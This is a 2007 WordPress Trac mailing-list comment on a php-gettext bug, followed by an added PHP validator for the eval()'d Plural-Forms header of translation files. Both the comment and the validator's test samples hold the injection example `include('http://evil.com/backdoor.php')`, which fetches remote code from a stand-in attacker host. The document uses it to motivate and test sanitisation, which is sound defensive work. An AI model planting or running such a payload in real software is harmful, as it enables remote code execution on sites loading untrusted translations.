[wp-trac] Re: [WordPress Trac] #4005: php-gettext's plural forms parsing is broken for nplurals>2
WordPress Trac
wp-trac at lists.automattic.com
Sat Mar 24 11:18:07 GMT 2007
#4005: php-gettext's plural forms parsing is broken for nplurals>2
------------------------------+---------------------------------------------
Reporter: moeffju | Owner: ryan
Type: defect | Status: new
Priority: high | Milestone: 2.2
Component: i18n | Version: 2.1.2
Severity: normal | Resolution:
Keywords: has-patch commit |
------------------------------+---------------------------------------------
Comment (by moeffju):
I wrote that chunk of code for Habari, and just ported it over to
php-gettext/wordpress. Sanitizing the plural-forms header seems reasonable
since it will be eval()'d with only minor changes, and it is user-supplied
data; in theory you could put something there like
`include('http://evil.com/backdoor.php')`. Since the file format is binary
and WP translations are usually supplied by third parties, the input
should be treated as user input and sanitized thusly.

Re nbachiyski, good catch, although multiple semicolons should not matter.
--
Ticket URL: <http://trac.wordpress.org/ticket/4005#comment:8>
WordPress Trac <http://trac.wordpress.org/>
WordPress blogging software
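
An added example, not part of the original message and not php-gettext or WordPress code: one way to treat the plural-forms header as untrusted input is to accept only the tokens a plural rule can contain before anything is evaluated. The function name `parse_plural_forms_strict()` and the sample header values are assumptions made for illustration; the function expects the header value without the `Plural-Forms:` prefix.

```php
<?php
// Added example: allowlist validation of a Plural-Forms header value.
// parse_plural_forms_strict() is a hypothetical name, not a php-gettext function.
function parse_plural_forms_strict($header)
{
    // Required shape: "nplurals=<int>; plural=<expr>" plus optional trailing semicolons.
    if (!preg_match('/^\s*nplurals\s*=\s*(\d{1,2})\s*;\s*plural\s*=\s*([^;]+?)[\s;]*$/', $header, $m)) {
        return null;
    }
    $expr = preg_replace('/\s+/', '', $m[2]);

    // Tokens a plural rule may contain: the variable n, integers, C operators.
    // A lone "=" (assignment), quotes, "$", commas and identifiers are not tokens.
    $token = '(?:n|\d+|==|!=|<=|>=|&&|\|\||[?:%!<>+\-*\/()])';
    if (!preg_match('/^' . $token . '+$/', $expr)) {
        return null;
    }
    // Two operands with no operator between them ("nn", "n5", "5n") are malformed.
    if (preg_match('/(?:n|\d)n|n\d/', $expr)) {
        return null;
    }
    // Parentheses must balance and never close before they open.
    $depth = 0;
    foreach (str_split($expr) as $c) {
        if ($c === '(') {
            $depth++;
        }
        if ($c === ')' && --$depth < 0) {
            return null;
        }
    }
    if ($depth !== 0) {
        return null;
    }
    return array('nplurals' => (int) $m[1], 'plural' => $expr);
}

// Constructed sample header values (not taken from a real .mo file).
$samples = array(
    'nplurals=2; plural=n != 1;',
    'nplurals=3; plural=(n%10==1 && n%100!=11 ? 0 : n%10>=2 && n%10<=4 && (n%100<10 || n%100>=20) ? 1 : 2);;',
    "nplurals=2; plural=include('http://evil.com/backdoor.php');",
    'nplurals=2; plural=n=1;',
);
foreach ($samples as $s) {
    $r = parse_plural_forms_strict($s);
    echo ($r === null ? 'REJECT' : 'ACCEPT ' . $r['plural']), '  <-  ', $s, "\n";
}
```

The token check rules out function calls, strings and assignment; it does not prove the expression is syntactically valid, so a caller should still treat an evaluation failure as a rejected header.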